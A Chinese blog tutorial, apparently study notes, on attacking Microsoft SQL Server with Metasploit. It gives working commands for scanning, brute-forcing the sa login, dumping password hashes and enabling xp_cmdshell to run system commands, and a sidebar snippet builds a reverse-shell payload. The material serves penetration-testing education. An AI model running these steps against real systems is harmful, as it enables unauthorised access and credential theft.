使用metasploit对SQL server渗透测试提权

最新推荐文章于 2022-08-06 12:02:07 发布
最新推荐文章于 2022-08-06 12:02:07 发布
阅读量646 收藏 3
点赞数 1
分类专栏: 精通Metasploit学习笔记 文章标签: metasploit kali linux 渗透测试 sqlserver
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116611067
版权

文章目录

前言

简单介绍了使用metasploit对SQL server进行渗透测试提权

一、使用nmap进行踩点

db_nmap -sV -p1433 1434 192.168.1.106	#使用nmap进行扫描
services	#显示出服务
db_namp -sU --script=ms-sql-info -p1434 192.168.1.106	#使用脚本进行扫描,可以获取详细信息

二、使用metasploit进行扫描

use auxiliary/scanner/mssql/mssql_ping	#使用msf专用的ms sql扫描模块
options	#显示可设置参数
set rhost 192.168.1.106	#设置参数
run	#进行扫描

相对于nmap比,msf模块可读性较高

三、破解sqlserver密码

use auxiliary/scanner/mssql/mssql_login	#使用msf中对身份验证进行暴力破解的模块
set rhosts 192.168.1.106	#设置参数
run	#进行暴力破解

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true             yes       Whether to print output for all attempts

可以对USER_FILE和PASS_FILE进行设置(导入字典),进行更全面的暴力破解

四、查找服务器其他用户口令

use auxiliary/scanner/mssql/mssql_hashdump	#获取服务器其他用户密码的哈希值
options	#显示设置
set rhosts 192.168.1.106	#设置参数
run	#进行扫描

获得结果后使用第三方工具进行解密,就可以提升权限

五、浏览SQL server

use auxiliary/scanner/mssql/msql_enum
options
set username ....
set password 123456
set rhosts 192.168.1.106
run

六、后渗透

使用mssql_sql模块进行sql查询、使用mssql_exec启用已经被禁用的xp_cmdshell,执行系统级命令

use auxiliary/admin/mssql/mssql_exec	#使用exec执行cmd命令
options
set CMD 'ipconfig'	#cmd命令
run

使用mssql_sql进行sql语句执行

msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > options

Module options (auxiliary/admin/mssql/mssql_sql):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   PASSWORD                               no        The password for the specified username
   RHOSTS                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433              yes       The target port (TCP)
   SQL                  select @@version  no        The SQL query to execute
   TDSENCRYPTION        false             yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentification (requires DOMAIN option set)

msf6 auxiliary(admin/mssql/mssql_sql) >

总结

本文简单介绍了metasploit对SQL server渗透测试提权的基本方法和步骤,仅供学习参考,有问题多多讨论

我重来不说话
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali的Metasploit-Framework利用漏洞入侵Windows2003Server
路~可以走过
04-16 3569
根据上篇的塔建:https://blog.csdn.net/qq_41709494/article/details/89278964 #用VMware塔建Windows2003Server靶机,IP地址是:192.168.137.128 #还部分信息没截图就省略了 #塔建仅主机模式(Host-Only)网络Windows2003Server可以上网 #打勾允许其他网络用户...
系列(二)----Windows Service 服务器之Mssql,GetPass,hash,LPK
fendo
03-29 1万+
(一)、Mssql 必要条件:获取到mssql数据库最高限用户sa的账号密码 Mssql默认端口:1433 Mssql最高限用户:sa 得到sa密码之后,通过工具直接连接上去。 MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。 (二)、GetPass 一款获取计算机
SQL Server数据库常见漏洞总结和渗透测试,附 sqlserver sa帐户无法连接
爱上卿的博客
01-22 5899
SQL Server渗透测试方法 1.默认端口:1433(Server 数据库服务)、1434(Monitor 数据库监控)、(ms-sql-hidden    2433/tcp) 2.弱口令 Msf或者Scansql扫描器扫描SA用户空/弱口令,弱口令获得之后运用SQLtools或者sql server分析器等进行连接,然后进行上传、查询和执行相关操作。 以SA用户通过SQL Serve...
第十节: 利用SQLServer实现Quartz的持久化和双机热备的集群模式
sinolover的专栏
01-15 398
背景:默认情况下,Quartz.Net作业是持久化在内存中的,即 quartz.jobStore.type = "Quartz.Simpl.RAMJobStore, Quartz",这种模式有以下弊端: ① 想在A服务器上控制B服务器上已经发布了的job和trigger不方便; ② 很难实现Web端(寄宿在IIS上)管理作业,客户端(发布成服务)的这种模式。 ③ 最大弊端就是一旦服务器宕...
metasploit、powershell之Windows错误系统配置漏洞实战
Ms08067安全实验室
12-09 745
引言我们在获得目标机一个普通的限时,除了常规方法外,还可以通过查找目标主机错误的系统配置和漏洞来获取系统限。本节所讲的“Trusted Service Paths(可信任服务路径...
渗透之——Metasploit渗透MSSQL
冰河的专栏
01-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86535576 攻击机 kali 192.168.109.137 靶机 Win7_x64 192.168.109.139 数据库 MSSQL 2008 R2 MSSQL运行在TCP的1433端口以及UDP的1434端口 1.使用NMAP对MSSQL进行踩点 这里,我们使...
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2377
【kali-漏洞利用】应用渗透攻击过程
metasploit mysql_metasploit下Windows下多种方式
weixin_36080429的博客
02-01 288
metasploit下Windows下多种方式前言当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全限,你需要绕过限制,获取本来没有的一些限,这些限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒。Metasploit有很多种后渗透方法,可以用于对目标机器的限绕过,最终获取到系统限。环境要求:1.攻击机:kali linux2.目标机:Wi...
使用metasplit
qq_42307546的博客
03-26 1361
生成反弹shell木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.15lport=12345 -f exe >s.exe 开启监听 console use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.15 set lport 12345 run ...
113.网络安全渗透测试—[升篇11]—[Windows 2003 Mysql MOF]
qwsn
07-06 2074
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而的原理就是在拥有了mysql的root限以后(其实就是获得了MySQL的启动身份),然后使用限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
metasploit使用lnk漏洞渗透测试.doc
03-18
metasploit使用lnk漏洞渗透测试.doc
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
关于Metasploit Framework与渗透测试相关知识
最新发布
12-28
关于Metasploit Framework与渗透测试相关知识
利用SqlServer触发器自动更新表updatetime字段值
热门推荐
cong_da_da的博客
08-29 3万+
本文主要记录了使用SqlServer数据库触发器自动更新表的"更新时间updatetime"字段 在 MySQL数据库中,某行数据创建时间字段 createtime 、 行最新更新时间字段updatetime 可建表时分别用"datetime DEFAULT CURRENT_TIMESTAMP" 和 " datetime DEFAULT CURRENT_TIMESTAMP ON UPDATE C...
使用kail中Metasploit获取Windows的限并
yuchen的博客
01-07 1885
0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 2.移动木马至/var/www/html目录下 3.给木马文件evil.exe加上X限 4.kali需要开启Apache2服务 5.用windows打开kali得ip下载木马文件 6.前查看postgresql运行状态/etc/init.d/postgresql status 打开postgresql数据库/etc/init.d/postgresql start 打开后才会出现绿点 7.开启MSF 8
metasploit mysql_MYSQL的各种姿势
weixin_31682257的博客
01-26 122
一、利用mof前段时间Kingcope大牛发布了mysql远程0day,剑心牛对MOF利用进行了分析,如下:Windows 管理规范 (WMI) 供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法。方法 ...
小白日记24:kali渗透测试(四)--利用漏洞
ZiXuanFY的博客
10-09 5655
利用漏洞实例 前:已渗透进一个XP或2003系统 一、实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1、通过searchsploit命令查找漏洞 【注:查找漏洞的命令行窗口要能完全显示Tit
metasploit渗透测试
08-02
Metasploit是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它可以帮助您查找、利用和验证漏洞,并附带了数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具开发平台。在使用Metasploit进行渗透测试时,一般可以按照以下步骤进行操作: 1. 确定漏洞:首先需要确定目标系统存在的漏洞,可以通过查找已知漏洞来进行。例如,可以使用命令"search 漏洞名称"来搜索相关模块[2]。 2. 查找模块:一旦确定了目标漏洞,可以使用Metasploit的模块来进行攻击。可以使用命令"search 漏洞名称"来查找相关模块[2]。 3. 配置模块程序:在使用模块之前,需要配置相关参数,例如设置攻击载荷、设置参数等。可以使用命令"use 模块名称"来选择要使用的模块,然后使用"set 参数名称 值"来配置参数[2]。 4. 执行模块程序:配置完成后,可以使用命令"exploit"或"run"来执行模块程序,进行漏洞利用[2]。 总的来说,Metasploit是一个功能强大的渗透测试工具,可以帮助安全专业人员评估系统的安全性,并供了丰富的漏洞攻击工具和模块,以支持渗透测试工作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值